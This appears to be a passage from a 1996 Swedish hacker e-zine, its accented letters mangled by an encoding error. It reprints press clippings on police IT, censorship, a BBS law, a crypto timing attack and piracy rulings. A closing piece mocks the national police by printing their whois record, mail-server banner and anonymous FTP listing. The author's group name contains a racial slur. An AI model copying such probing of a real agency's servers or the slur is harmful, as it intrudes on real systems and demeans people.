skulle l<>ggas ut p<> ett konsultf<74>retag. Att g<>ra det <20>r enligt
RPS en mycket k<>nslig fr<66>ga, och strax f<>re <20>rsskiftet f<>rbj<62>d
man uttryckligen Malm<6C>polisen att fullf<6C>lja planerna, ber<65>ttar
Sveriges Televisions Sydnytt. Hans Wranghult, som bland annat
utrett databrott och <20>r RPS databrottsexpert, f<>rv<72>nas <20>ver
beslutet:
-Jag har planerat detta sedan h<>sten 1994 och naturligtvis
gjort s<>kerhetsbed<65>mningar.
-I <20>ver ett <20>r har RPS dessutom haft full insyn och f<>tt
information om projektets fortskridande. Senast i september var
en representant fr<66>n RPS p<> bes<65>k h<>r, s<>ger Wranghult till TT.
Under hela processen fram tills helt nyligen har l<>nspolis-
m<EFBFBD>staren varit <20>vertygad om att konsultprojektet d<>rf<72>r varit
f<EFBFBD>rankrat och uppskattat hos RPS.
Stategisk betydelse
Det var RPS dataexpert Bj<42>rn Lindqvist som bes<65>kte Malm<6C> i
h<EFBFBD>stas. Hans bild <20>r n<>got annorlunda <20>n Wranghults.
-Jag kan bara beklaga om Hans Wranghult fick intrycket att vi
var positiva till outsourcing. I sj<73>lva verket f<>ranleddes mitt
bes<EFBFBD>k av att vi d<> helt nyligen insett omfattningen av Malm<6C>s
planer.
-Efter mitt Malm<6C>bes<65>k gjorde jag omedelbart en muntlig rapport
till rikspolisstyrelsens direktion.
-Wranghult borde ha insett att detta var en fr<66>ga av strategisk
betydelse, ett beslut som ytterst m<>ste hamna hos rikspolischefen.
Lindqvist p<>pekar ocks<6B> att l<>nspolisorganisationerna i
Stockholm och G<>teborg klarar av att i huvudsak sj<73>lva h<>lla i
sin datahantering.
-Det kan f<>rekomma vissa konsultinsatser. Men total outsourcing,
som Malm<6C> planerade, finns inte n<>gonstans inom polisen, s<>ger
han.
RPS uttryckliga f<>rbud mot att anv<6E>nda ett utomst<73>ende f<>retag
f<EFBFBD>r drift, underh<72>ll, och fortbildning inom datahanteringen,
tvingade Malm<6C>polisen att bryta samarbetet med det databolag
som d<> redan arbetat med en totalinventering av myndighetens
datahantering.
900 000 kronor <20>r hittills nedpl<70>jda i projektet.
-Men det <20>r inte pengar som kastats i sj<73>n. Den st<73>rsta
kostnaden ligger just p<> inventering och dokumentation, menar
Wranghult.
Efter kallduschen med RPS f<>rbud har l<>nspolismyndigheten i
Malm<EFBFBD> ocks<6B> hunnit g<> vidare i arbetet med att bygga upp den
egna kompetensen p<> omr<6D>det. Den g<>ngna helgen annonserade man
exempelvis efter en datachef.
---------------------------------------------------------------------------
6.4 Svenska Dagbladet, 960206 Sex och politik bannlyst
---------------------------------------------------------------------------
Den allm<6C>nna ordningen m<>ste uppr<70>tth<74>llas. Det inneb<65>r att
kineserna f<>r klara sig utan politik och sex p<> Internet. Den
kinesiska regeringen b<>rjar bli orolig f<>r att cyberrymden ska
f<EFBFBD>rvrida huvudena p<> alla n<>tsurfare. Ministeriet f<>r Post och
Tele ska se till att alla Internetanv<6E>ndare registreras och att
alla kontakter med internationella datan<61>t g<>r via ministeriet,
enligt tidningen Financial Times.
Allt f<>r att komma ifr<66>n "oh<6F>lsosamma tendenser" i samh<6D>llet.
Exempel p<> s<>dana tendenser <20>r individer som sysslar med
statshemligheter och pornografiskt material - s<> kallad
barbarisk information.
Icke <20>nskv<6B>rt
Hur ska d<> Kina f<> stopp p<> informationen som fl<66>dar p<> Internet.
Jo, genom att skapa en "Internet Light" d<>r anv<6E>ndarna har
obegr<EFBFBD>nsad tillg<6C>ng tillvarandras material men avsk<73>rmas fr<66>n det
som inte <20>r "<22>nskv<6B>rt" fr<66>n omv<6D>rlden. Kina g<>r med i det nya
informationssamh<EFBFBD>llet, men begr<67>nsar samtidigt tillg<6C>ngligheten,
skriver tidningen Wall Street Journal. <20>n s<> l<>nge anv<6E>nder bara
50 000 m<>nniskor Internet i Kina. F<>r vetenskapsm<73>n <20>r n<>tet en
guldgruva eftersom informationen <20>r gratis.
Explosiv brygd
Den kinesiska regeringen fruktar fr<66>mst politisk opposition och
pornografi. Dissidenter som skickar information via n<>tet till
sympatis<EFBFBD>rer i Kina <20>rinte popul<75>ra.
Regeringens "Internet Light" inneb<65>r att de kinesiska anv<6E>ndarna
kan skapaegna hemsidor, byta information med varandra, anv<6E>nda
databaser och bes<65>kade hemsidor som accepteras av regimen. <20>vriga
delar av Internet g<>rs otillg<6C>ngliga med hj<68>lp av ett mjukvaru-
program fr<66>n det amerikanska f<>retaget Sun Microsystems.
Kineserna erk<72>nner att en hacker kan ta sig igenom. Men det <20>r
b<EFBFBD>de sv<73>rt och riskfyllt att bryta mot reglerna.
Sex och politik <20>r tydligen en explosiv brygd i Kina.
---------------------------------------------------------------------------
6.5 Datateknik, 960215 Slutet f<>r de elektroniska klotterplanken
---------------------------------------------------------------------------
Den 30 augusti 1995 h<>lls i Rosenbad en hearing kring ett
lagutkast om BBSer (Bulletin Board Systems). Eller elektroniska
anslagstavlor som de kallas p<> svenska.
Bland de fyrtiotal inviterade fanns folk fr<66>n myndigheter,
organisationer, universitet och n<>ringsliv, med stark kantring
<EFBFBD>t jurister. Ocks<6B> Telia, Postnet, Sunet, TT och olika regionala
n<EFBFBD>tverkssatningar var p<> plats. Samt en liten grupp n<>rmast
s<EFBFBD>rjande. BBSare fr<66>n det v<>rldsomsp<73>nnande BBS-n<>tet Fidonet,
men ocks<6B> fr<66>n de partipolitiska anslagstavlorna f<>r (s) och (m),
plus n<>gra till.
V<>rd var enmansutredaren i IT-utredningen, Hans Jacobsson, till
vardags chef f<>r bankst<73>dsn<73>mnden.
Vad var det d<> som Jacobsson satte i h<>nderna p<> g<>sterna? Jo,
ett lagf<67>rslag som var rena d<>dsst<73>ten f<>r allt vad BBSer heter.
Enligt f<>rslaget ska system<65>garen, eller en av honom utsedd
systemoperat<EFBFBD>r, ha ansvaret f<>r att BBSen inte inneh<65>ller n<>got
brottsligt. Anv<6E>ndare m<>ste loggas och registreras f<>r att vid
behov kunna sp<73>ras av polisen. Uppgifterna ska tillsammans med
det vederb<72>rande lagt in i basen sparas under ett <20>rs tid.
Datainspektionen ska ha full frihet att n<>r som helst
kontrollera databasen och efter eget gottfinnande st<73>nga den.
<EFBFBD>gare och systemoperat<61>r m<>ste ha uppn<70>tt myndig <20>lder! Klart
att det blev protester.
De lagkloka uppr<70>rdes lika mycket som n<>tadministrat<61>rer och
databasproducenter. Men i synnerhet f<>rst<73>s BBSarna sj<73>lva.
-Det <20>r helt oh<6F>llbart att l<>gga ansvaret p<> systemoperat<61>ren,
menar BBSaren Jonny Bergdahl som var med p<> hearingen f<>r ett
halv<EFBFBD>r sedan.
-Ingen kommer att v<>ga ha det jobbet. Bara genom min dator
passerar 1500 inl<6E>gg var dag. Man kan inte l<>sa allt!
-Och Datainspektionen f<>r i f<>rslaget st<73>rre makt <20>n polisen som
ju inte kan g<>ra husrannsakan utan att ha allvarliga misstankar
om brott!
Men alldeles uselt var nog inte f<>rslaget, f<>rsvarar sig IT-
utredningens sekreterare Per Furberg.
-Flera kom fram efter<65>t och tyckte det var bra. Varken Furberg
eller Jacobsson g<>r dock n<>gon hemlighet av att majoriteten var
starkt negativ.
N<>gra exempel: Om<4F>jligt att spara allt ett helt <20>r; om<6F>jligt att
registrera och kolla upp alla som ringer in till databasen;
orimligt att l<>gga sv<73>ra straffr<66>ttsliga bed<65>mningar p<>
systemoperat<EFBFBD>rerna.
Kanske, menar utredarna idag, var kritiken till stor del
sj<EFBFBD>lvf<EFBFBD>rv<EFBFBD>llad.
-Vi ville ha reaktioner s<> vi tog i ordentligt. Det var ett
provskott!
Leverans enligt order
Men med fyra timmars bandad kritik i bagaget var det bara f<>r
utredarna att efter hearingen v<>nda hem till lagskrivarverkstan
med svansen mellan benen.
Men <20>nd<6E>. Lydde inte utredarna bara order och effektuerade den
best<EFBFBD>llning de f<>tt? N<>r Bildtregeringen tillsatte IT-
utredningen sommaren 94 var det f<>r att ta udden ur de
kriminella anslagstavlorna. De som gjort sig bem<65>rkta som forum
f<EFBFBD>r allehanda brottslig verksamhet; piratkopiering, fr<66>mlings-
fientlig propaganda, eller som informationsk<73>lla f<>r
narkotikatillverkning, virussspridning med mera.
Att BBSer ocks<6B> kan vara kanaler f<>r <20>siktsutbyte omn<6D>mndes
f<EFBFBD>rvisso i utredningsdirektiven, men bara som en kollisionsrisk
mellan datalagens personregister och censurf<72>rbudet i etablerade
massmedier.
Det var tydligt att regeringen fr<66>mst var ute efter en snabbt
hopkommen strafflag som kunde f<> slut p<> avarterna bland BBSerna.
Ett syns<6E>tt den delar med m<>nga regeringar dessa dagar. Senast
dokumenterat i en Europar<61>dsrekommendation fr<66>n september 95,
d<EFBFBD>r medlemsl<73>nderna uppmanas utf<74>rda lagar som l<>gger ansvaret
p<EFBFBD> systemoperat<61>rerna. Och den svenske delegaten i arbetsgruppen
bakom rekommendationen hette f<>rst<73>s: Per Furberg! BBS-
kriminalitetens verkliga omfattning <20>r det ingen som k<>nner.
Enligt RPS sysslar minst 1000 av de 4000-6000 BBSerna i landet
regelm<EFBFBD>ssigt med brott.
Men <20>r de verkligen s<> o<>tkomliga med g<>llande lagar? B<>de ja
och nej.
En v<>rml<6D>ndsk BBS-<2D>gare i Karlstad blev f<>r en tid sedan
b<EFBFBD>tf<EFBFBD>lld f<>r att han till<6C>tit barnpornografiska bilder i sin
databas. Han hade inte sj<73>lv gjort n<>got f<>r att underl<72>tta
trafiken, men han k<>nde till den. Domen <20>verklagades men togs
aldrig upp av hovr<76>tten.
Ett annat omdebatterat fall <20>r helsingborgaren som <20>talats f<>r
att ha uppl<70>tit sin BBS f<>r spridning av piratkopior. M<>let
avg<EFBFBD>rs i dagarna av H<>gsta Domstolen, men tills dess g<>ller den
friande domen fr<66>n hovr<76>tten.
Denna os<6F>kerhet om lagstiftningens r<>ckvidd <20>r motivet till en
s<EFBFBD>rskild BBS-lag. I det prelimin<69>ra f<>rslaget passar utredarna
ocks<EFBFBD> p<> att g<>ra bland annat barnpornografi och rasistiska
uttalanden <20>talbara redan n<>r de n<>r fram till en BBS, vilket de
inte <20>r idag.
F<>rslaget har blivit en blandning av den tryckfrihetsr<73>ttsliga
modellen och vanlig strafflag. Enligt TF svarar en ansvarig
utgivare ensam f<>r brott som beg<65>s genom tryckt skrift. Enligt
BBS-lagen ansvarar alla! Inte bara systemoperat<61>ren f<>r ta
sm<EFBFBD>llen, utan <20>ven f<>rfattare och andra bidragsgivare, f<>r
kr<EFBFBD>nkande uttalanden, rasism, olagliga bilder och piratkopior.
Fast<EFBFBD>n uppenbarligen inspirerad av ansvarssystemet i TF och
Yttrandefrihetslagen (YGL) dr<64>mmer IT-utredningen till med
dubbelt straffansvar. Ja, m<>ngdubbelt om man bet<65>nker att i n<>t
som Fidonet samma information studsar <20>tskilliga g<>nger mellan
ett stort antal BBSer.
Alternativ finns
<20>ven diskussionsgrupper (newsgroups), och chats p<> Internet
tr<EFBFBD>ffas av bannbullan. Tusentals s<>dana m<>ten mellanlandar
dagligen p<> svenska universitets- och f<>retagsdatorer. Blir BBS-
f<EFBFBD>rslaget lag kommer Sveriges systemoperat<61>rer aldrig mer att
v<EFBFBD>ga g<> och l<>gga sig om n<>tterna. De m<>ste hela tiden kila upp
och kolla h<>rddisken! I Australien har man skissat en modell med
stegvis upptrappade sanktioner f<>r dem som sprider sex och v<>ld
p<EFBFBD> n<>tet. Men tills vidare har man stannat f<>r den l<>gsta
ingreppsniv<EFBFBD>n, sj<73>lvsanering bland n<>tadministrat<61>rerna. Under
tiden ska det faktiska behovet av en lagrevision kartl<74>ggas
ordentligt. I USA laborerar domstolarna redan med utgivaransvar
i vissa situationer. Databas<61>gare som bara uppl<70>ter plats p<>
skivminnen eller skickar materialet vidare obearbetat
(distributors) slipper ansvar. De som f<>rs<72>ker st<73>da och h<>lla
rent riskerar d<>remot att <20>ka dit (publisher), vilket den
v<EFBFBD>lk<EFBFBD>nda j<>tte-BBSen Prodigy fick erfara n<>r den d<>mdes som
ansvarig publisher f<>r <20>rekr<6B>nkande inl<6E>gg fr<66>n en deltagare i
den <20>ppna, mycket popul<75>ra, diskussionsgruppen Money Talks.
Det senaste i USA <20>r den nyligen antagna, Decency Act som <20>r en
del i den federala telelagen. D<>r bannlyses alla slags obsceniteter
i ord och bild p<> n<>tet. Framf<6D>rallt det som riktar sig mot
ungdomar under 18 <20>r. Databas<61>gare som medvetet till<6C>ter s<>dan
trafik straffas med dryga b<>ter eller upp till 2 <20>rs f<>ngelse.
De kan slippa ansvar om de p<> godtagbart s<>tt f<>rs<72>kt
hindra <20>tkomst f<>r ungdomar.
Ett alternativ som IT-utredningen f<>tt att fundera <20>ver kommer
fr<EFBFBD>n juristen vid Stockholms universitet Martin Brinnen. Han
skriver en doktorsavhandling om telemedier och menar att
utredningens f<>rslag <20>r on<6F>digt detaljerat.
Brinnen anser att man kan l<>gga ett generellt ansvar p<> alla
tele-och n<>toperat<61>rer f<>r det som g<>r genom deras n<>t. Den som
vill kan glida ur snaran genom att ha ett loggningssystem som
avsl<EFBFBD>jar avs<76>ndarna.
Enligt Brinnen skulle det r<>cka med ett litet ingrepp i
telelagen, och man skulle slippa irriterande regler om censur,
arkivering och tillsyn.
Senast den 31 mars i <20>r ska IT-utredningens slutf<74>rslag ligga
hos regeringen. Fr<46>n b<>rjan g<>llde 1 november-95 som deadline,
men efter debaclet vid hearingen beg<65>rde man extra tid.
Utredningen har ocks<6B> ett uppdrag om elektroniska dokument s<>
BBS-f<>rslaget har legat i tr<74>da sedan augusti.
-Men nu ska vi ta itu med den, s<>ger Hans Jacobsson.
T<>nkte f<>r sm<73>tt
Fr<46>gan <20>r vilken roll kritiken f<>r spela?
-Jag vet inte. Men det <20>r klart, n<>r vi skissade v<>rt f<>rslag
hade jag en liten sm<73>skalig BBS i Nyk<79>pingstrakten i tankarna.
Nu har jag f<>rst<73>tt att lagen drabbar m<>nga fler.
-Som n<>gon sa: r<>tt vad det <20>r dimper det ned 40 Megabyte news
fr<EFBFBD>n USA.
-Arkivering i ett <20>r under s<>dana omst<73>ndigheter <20>r att beg<65>ra
f<EFBFBD>r mycket.
<20>ven annat m<>ste nog ompr<70>vas menar Jacobsson. S<>dant som
m<EFBFBD>jligheterna att kontrollera inneh<65>llet och Datainspektionens
roll.
-Men den som vet vad han har i databasen b<>r kunna ta ett ansvar.
BBS-lagen skulle ha tr<74>tt i kraft till sommaren om det
ursprungliga schemat f<>ljts. Nu blir det tidigast till <20>rskiftet.
Nu st<73>r <20>tminstone tre olika kockar och r<>r i BBS-soppan.
F<EFBFBD>rutom Jacobssons utredning, <20>r det utredningen om Nya Medier
och en nytillsatt Datalagsutredning. Men alla <20>r i otakt och har
inte kunnat prata ihop sig.
Ett t<>nkbart scenario <20>r att det kollektiva ansvar som IT-
utredningen arbetar med kolliderar med ett enmansansvar av TFs
modell, vilket utredningen om Nya medier kan t<>nkas f<>resl<73>. Och
Datalagsutredningen kan snubbla p<> EUs persondatadirektiv vars
normer f<>r skydd av personuppgifter BBSer knappast lever upp
till.
Det kan bli en sv<73>r huvudv<64>rk f<>r regeringen. En ny lag f<>r
kanske snabbt bukt med problemen, men l<>per <20> andra sidan risk
att beh<65>va <20>ndras radikalt redan efter n<>got <20>r.
---------------------------------------------------------------------------
6.6 Datateknik, 960215 Netscapes kryptering bruten p<> nytt-med gammal metod
---------------------------------------------------------------------------
Dagens krypteringsalgoritmer <20>r inte s<> s<>kra som experterna
vill l<>ta g<>ra g<>llande. De kan inte kn<6B>ckas med matematiska
eller kryptotekniska tillv<6C>gag<61>ngss<73>tt. D<>remot kan de vara
mycket s<>rbara mot okonventionella metoder.
Paul Kocher, biologistuderande och inte alls n<>gon
s<EFBFBD>kerhetseller kryptoexpert, lyckades hitta en allvarlig svaghet
i dagens krypteringssystem med <20>ppna nycklar. Han visade att
tiden det tar f<>r att koda och avkoda meddelanden kan avsl<73>ja
information om viktiga delar i krypteringsalgoritmerna.
M<>nga krypteringsprogram arbetar med <20>ppna nycklar. Den <20>ppna
nyckeln <20>r k<>nd, medan varje anv<6E>ndare har en egen privat.
Nycklarna <20>r vanligen mycket stora primtal. Vissa
krypteringsprogram, som det i Netscape, anv<6E>nder den privata
nyckeln som en exponent. Det h<>jer den privata nyckeln och ett
annat primtal till potensen av den privata nyckeln, allts<74>
nyckeln upph<70>jt till sig sj<73>lvt.
Paul Kocher uppt<70>ckte att han fick ledtr<74>dar till utformningen
av den privata nyckeln efter hur l<>ng tid meddelanden av olika
l<EFBFBD>ngd tar att koda och avkoda. En miljard kombinationer kan vara
om<EFBFBD>jligt f<>r en hacker att forcera, men om man genom Kochers
teknik kan minska antalet m<>jliga fall till en miljon <20>r
krypteringen inte l<>ngre s<>ker. Problemet med de olika
ber<EFBFBD>kningstiderna har l<>nge varit k<>nt inom forskningen p<>
kryptering, men kryptoexperter <20>r matematiker och inga
s<EFBFBD>kerhetsexperter, och kunskapen har inte tr<74>ngt ut.
---------------------------------------------------------------------------
6.7 Datateknik, 960215 Storebror fumlar med lagb<67>ckerna
---------------------------------------------------------------------------
En statlig utredning f<>resl<73>r att den som driver en BBS m<>ste
vara minst 18 <20>r och att han ska vara ansvarig f<>r att basen
inte inneh<65>ller n<>got brottsligt. Han ska logga anv<6E>ndarna s<>
att de kan sp<73>ras av polisen och han ska spara allt som skickas
in under ett <20>r. Det <20>r f<>rst<73>s ett orimligt f<>rslag som, om det
genomf<EFBFBD>rs, raderar ut hela BBS-kulturen. Och d<>rmed en hobby som
sannolikt lockat m<>nga ungdomar att bli datatekniker. H<>r m<>ste
lagstiftarna hitta b<>ttre l<>sningar.
Christer <20>kerman visar p<> sidorna 22-25 i detta nummer av
Datateknik p<> de problem som upps<70>tr om lagen antas. I USA har
presidenten just skrivit p<> en ny telekommunikationslag. I lagen
ing<EFBFBD>r en del som kallas Decency Act och som inneb<65>r att
obsceniteter i ord och bild bannlyses p<> n<>tet. Framf<6D>rallt vill
man stoppa det som riktar sig till ungdomar under 18 <20>r. Porr
f<EFBFBD>r endast spridas om man f<>rs<72>krat sig om att mottagaren <20>r
vuxen och att denne verkligen vill se materialet.
F<>rslaget har f<>tt m<>nga WWW-publicister att protestera genom
att l<>gga en sorgsvart bakgrund p<> sina sidor. Denna amerikanska
strid st<73>r, f<>renklat, mellan en tryckfrihetsfundamentalistisk
falang och den inflytelserika kristna h<>gern. Mer om detta p<>
v<EFBFBD>ra nyhetssidor.
L<>gg s<> till dessa b<>da aktuella h<>ndelser debatten kring
krypteringen. <20>tskilliga av v<>rldens stater vill f<>rhindra allt
f<EFBFBD>r kraftfull kryptering. V<>rldens storebr<62>der vill ist<73>llet att
vi ska anv<6E>nda kryptering med inbyggda l<>nnd<6E>rrar f<>r polisen.
USA har f<>rbjudit export av krypton med alltf<74>r l<>nga nycklar.
Vad vi ser <20>r en match mellan tekniken (och individuella
tekniker) och staterna. Det <20>r sv<73>rt att tro att inte staterna
till slut tar hem spelet. Men det <20>r ocks<6B> sv<73>rt att se hur de
ska lyckas med det n<>r teknikerna tagit fram en s<>
decentraliserade n<>tl<74>sning som Internet.
---------------------------------------------------------------------------
6.8 TT, 960222 HD l<>t datakopierare beh<65>lla utrustning
---------------------------------------------------------------------------
H<>gsta domstolen mildrade hovr<76>ttens dom och l<>ter en 22-<2D>rig
Stockholmare beh<65>lla merparten av sin datorutrustning. I
hovr<EFBFBD>tten d<>mdes mannen f<>r upphovsr<73>ttsintr<74>ng. Tv<54> datorer och
sex h<>rddiskar ans<6E>gs vara f<>rverkade.
HD l<>ter 22-<2D>ringen beh<65>lla allt utom en h<>rddisk som r<>tten
anser inneh<65>lla upphovsr<73>ttsligt skyddat material som spritts
via en elektronisk brevl<76>da, Bulletin Board System (BBS). 22-
<EFBFBD>ringen har i sitt hem haft en databas med mycket stor
kapacitet. I databasen har han haft minst 1 000 program som
varit upphovsr<73>ttsligt skyddade.
Under 1992 och 1993 gjorde mannen programmen tillg<6C>ngliga f<>r
omkring 300 anv<6E>ndare genom sin BBS. I databasen f<>rekom ocks<6B>
byten och kopieringar av olika program mellan anv<6E>ndarna. I HD:s
dom p<>pekar man att f<>rverkande enligt upphovsr<73>ttslagen endast
kan bli aktuell om man tror att material ska anv<6E>ndas f<>r
brottslig verksamhet.
HD anser att det bara <20>r en av h<>rddiskarna som inneh<65>ller det
upphovsr<EFBFBD>ttsskyddade material som 22-<2D>ringen spritt i sin BBS.
D<EFBFBD>rf<EFBFBD>r f<>r han nu tillbaka det andra materialet.
---------------------------------------------------------------------------
6.9 Computer Sweden, 960227 Lucka i lagen skyddar piratkopior
---------------------------------------------------------------------------
Det <20>r inte olagligt att ha en BBS d<>r vem som helst kan h<>mta
hem piratkopierade program.
H<>gsta domstolen friade i torsdags en man som drev en s<>dan BBS,
eftersom han inte sj<73>lv aktivt medverkat till spridningen.
Medverkandeansvaret togs aldrig upp n<>r en man fr<66>n Helsingborg
stod <20>talad i h<>gsta domstolen f<>r brott mot upphovsr<73>ttslagen.
Mannen drev i b<>rjan av 90-talet en BBS, en elektronisk
anslagstavla, d<>r piratkopierade program fanns tillg<6C>ngliga f<>r
vem som helst att h<>mta.
-Domen <20>r bekymrande f<>r mjukvaruindustrin. Som domen <20>r
formulerad s<>ger den att man i princip aldrig kan utkr<6B>va ansvar
av en systemoperat<61>r, s<>ger advokat Agne Lindberg som <20>r
juridiskt ombud f<>r leverant<6E>rsorganisationen Business Software
Alliance.
-BSA kommer att verka f<>r en lagf<67>r<EFBFBD>ndring. Det borde g<> att
kr<EFBFBD>va ansvar av den som k<>per modem och l<>gger upp en databas.
HD konstaterar i sin dom att det finns en p<>taglig lucka i det
upphovsr<EFBFBD>ttsliga skyddet f<>r program, men domstolen ans<6E>g att
man m<>ste d<>ma enligt lagens bokstav, och d<> ska mannen frias.
-Hovr<76>tten kunde inte bevisa att programmen faktiskt hade
kopierats. Dessutom kr<6B>vs bevis f<>r att mannen var medveten om
kopieringen. D<>rf<72>r kunde HD inte ta upp fr<66>gan, s<>ger Nils
Rekke, byr<79>chef hos Riks<6B>klagaren.
Mannen f<>lldes i tingsr<73>tten men friades i hovr<76>tten. Nu har han
allts<EFBFBD> friats <20>ven av h<>gsta domstolen.
[ Se http://www.dsv.su.se/~jpalme/BBS-domen-HD-96-02-22.html f<>r
det fullst<73>ndiga domslutet ]
__ _ _ ___ ___
___ ( _| U | ) = __________________________________________________________
7.0 ___)___)_)_\_| av htXs
Den hetaste URL:en just nu m<>ste vara www.takedown.com, i alla fall om man
f<EFBFBD>r r<>kna imponansv<73>rdet i "Kevin-on-Demand". Vi rekommenderar ett omedelbart
bes<EFBFBD>k.
Om du inte skulle ha tillg<6C>ng till en grafisk browser, g<> rakt p<> h<>jdpunkten
och telnet:a till kevin-on-demand.takedown.com p<> n<>gon port mellan 4001 och
4028. Den vedertagna uppfattningen <20>r nog att 4010 <20>r absolut b<>st.
Du beh<65>ver inte g<>ra n<>got aktivt f<>r att njuta av f<>rest<73>llningen, men du kan
anv<EFBFBD>nda f<>ljande knappar f<>r att styra hastigheten:
0-9 Move at a rate of 0-9. (0 is stopped.)
> Move forward.
If already moving forward, increase speed.
< Move in reverse.
If already in reverse, increase speed.
} Single-step forward.
{ Single-step backward.
+ Increase speed by 0.5.
- Decrease speed by 0.5.
f,p Move forward. Reset speed to 1.
F,P Move forward. Reset speed to 10.
r Move in reverse. Reset speed to 1.
R Move in reverse. Reset speed to 10.
s Slow, then slower.
/ Skip.
<space> Pause.
q Exit.
__ __ __ ___ ___
___ | V | ( _| __) _______________________________________________________
8.0 |__v__|__|___)___)
Rikspolisstyrelsen p<> Internet
av
Broken Pipe
[NWS - Niggaz With Sniffers]
Det verkar inte s<>mre <20>n att snuten <20>mnar g<>ra sin n<>rvaro p<> Internet k<>nd
genom att forts<74>tta sitt arbete med att sprida harmoni, gl<67>dje och m<>nnisko-
k<EFBFBD>rlek <20>ven i digital form.
domain: police.se
org: Rikspolisstyrelsen
admin-c: Patric Ostman
address: Box 12256, S-102 26 Stockholm
phone: +46 8-4019540
fax-no: +46 8-6507787
Dom<EFBFBD>nen best<73>r av ett litet n<>t med ett par PCs och i alla fall en HP-box.
Vad RPS internetssatsning kommer att inneb<65>ra, och hur l<>ngt de kommit <20>r
sv<EFBFBD>rt att s<>ga. De har en www-sida som best<73>r av meddelandet "under
uppbyggnad", och deras mail-server har f<>ljande att s<>ga om livet:
220 mail.police.se ESMTP server (post.office v1.9.1 **** trial license expired ****) ready
Dock verkar den fortfarande vara funktionsduligt. Vi f<>r verkligen hoppas att
inte RPS *olagligt* nyttjar en licens som g<>tt ut!
Det enda som man kan vara helt s<>ker p<> <20>r att den anonyma ftp-servern p<>
ftp.police.se inte <20>r subventionerad av ledningen inom Rikspolisstyrelsen.
Eller <20>r detta ett helt nytt grepp f<>r att <20>ka polisens popul<75>ritet?
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 13232
drwxr-xr-x 3 root root 3072 Jul 31 1995 .
drwxrwxr-x 3 root wheel 1024 Jul 31 1995 ..
-rw-r--r-- 1 root root 15395 Jul 31 1995 00INDEX
-rw-r--r-- 1 root root 126176 Jul 31 1995 GiaGary.gif
-rw-r--r-- 1 root root 56419 Jul 31 1995 LiLi.jpg
-rw-r--r-- 1 root root 25857 Jul 31 1995 NEWinona17.jpg
-rw-r--r-- 1 root root 1840 Jul 31 1995 README.uploads
-rw-r--r-- 1 root root 37391 Jul 31 1995 W_Ryder.jpg
-rw-r--r-- 1 root root 104200 Jul 31 1995 WinRyder08.jpg
-rw-r--r-- 1 root root 120206 Jul 31 1995 WinRyder09.jpg
-rw-r--r-- 1 root root 8846 Jul 31 1995 WinonaAgeInn1.jpg
-rw-r--r-- 1 root root 13716 Jul 31 1995 WinonaAgeInn2.jpg
-rw-r--r-- 1 root root 27053 Jul 31 1995 WinonaAgeInn3.jpg
-rw-r--r-- 1 root root 36359 Jul 31 1995 WinonaAndJohnny.jpg
-rw-r--r-- 1 root root 39715 Jul 31 1995 WinonaBeach.jpg
-rw-r--r-- 1 root root 141603 Jul 31 1995 WinonaBed.jpg
-rw-r--r-- 1 root root 11776 Jul 31 1995 WinonaBigHair.jpg
-rw-r--r-- 1 root root 55552 Jul 31 1995 brooke.gif
-rw-r--r-- 1 root root 34144 Jul 31 1995 chlock.gif
-rw-r--r-- 1 root root 490090 Jul 31 1995 death_drop.gif
-rw-r--r-- 1 root root 178693 Jul 31 1995 dick_button1.gif
-rw-r--r-- 1 root root 492033 Jul 31 1995 doubleAxel2.gif
-rw-r--r-- 1 root root 101999 Jul 31 1995 elaine_zayak1.gif
-rw-r--r-- 1 root root 76037 Jul 31 1995 elana1.jpg
-rw-r--r-- 1 root root 413766 Jul 31 1995 flip.gif
-rw-r--r-- 1 root root 26064 Jul 31 1995 impressionist.gif
-rw-r--r-- 1 root root 61489 Jul 31 1995 janet.jpg
-rw-r--r-- 1 root root 245397 Jul 31 1995 karen_bryden.jpg
-rw-r--r-- 1 root root 29130 Jul 31 1995 katerina_witt1.jpg
-rw-r--r-- 1 root root 81503 Jul 31 1995 katerina_witt2.gif
-rw-r--r-- 1 root root 129860 Jul 31 1995 katerina_witt3.jpg
-rw-r--r-- 1 root root 184112 Jul 31 1995 katerina_witt4.gif
-rw-r--r-- 1 root root 90131 Jul 31 1995 katerina_witt5.gif
-rw-r--r-- 1 root root 74982 Jul 31 1995 katerina_witt6.gif
-rw-r--r-- 1 root root 307617 Jul 31 1995 kerrig2a.gif
-rw-r--r-- 1 root root 276742 Jul 31 1995 kerrig3a.gif
-rw-r--r-- 1 root root 204805 Jul 31 1995 kerrig4a.gif
-rw-r--r-- 1 root root 341938 Jul 31 1995 kerrig5a.gif
-rw-r--r-- 1 root root 335129 Jul 31 1995 kerrig6a.gif
-rw-r--r-- 1 root root 127534 Jul 31 1995 kimbass2.gif
-rw-r--r-- 1 root root 43747 Jul 31 1995 kimbass5.jpg
-rw-r--r-- 1 root root 45025 Jul 31 1995 kristi_yamaguchi1.gif
-rw-r--r-- 1 root root 95620 Jul 31 1995 kristi_yamaguchi2.jpg
-rw-r--r-- 1 root root 18101 Jul 31 1995 kristi_yamaguchi3.jpg
-rw-r--r-- 1 root root 21514 Jul 31 1995 kristi_yamaguchi4.jpg
-rw-r--r-- 1 root root 185324 Jul 31 1995 lisa_ervin1.gif
-rw-r--r-- 1 root root 392736 Jul 31 1995 loop.gif
-rw-r--r-- 1 root root 47811 Jul 31 1995 lu_chen1.jpg
-rw-r--r-- 1 root root 385173 Jul 31 1995 lutz.gif
-rw-r--r-- 1 root root 70669 Jul 31 1995 mariah1.jpg
-rw-r--r-- 1 root root 185063 Jul 31 1995 michelle_kwan1.gif
-rw-r--r-- 1 root root 181683 Jul 31 1995 michelle_kwan2.gif
-rw-r--r-- 1 root root 56616 Jul 31 1995 midori_ito1.gif
-rw-r--r-- 1 root root 36392 Jul 31 1995 midori_ito2.jpg
-rw-r--r-- 1 root root 68899 Jul 31 1995 nancy_kerrigan1.gif
-rw-r--r-- 1 root root 100710 Jul 31 1995 nancy_kerrigan2.gif
-rw-r--r-- 1 root root 29968 Jul 31 1995 nancy_kerrigan3.jpg
-rw-r--r-- 1 root root 30609 Jul 31 1995 nb_camp1.gif
-rw-r--r-- 1 root root 164823 Jul 31 1995 nicole_bobek1.gif
-rw-r--r-- 1 root root 39173 Jul 31 1995 nk_camp1.gif
-rw-r--r-- 1 root root 69377 Jul 31 1995 ob_camp1.gif
-rw-r--r-- 1 root root 48874 Jul 31 1995 ob_camp2.gif
-rw-r--r-- 1 root root 62745 Jul 31 1995 ob_camp3.gif
-rw-r--r-- 1 root root 64580 Jul 31 1995 ob_camp4.gif
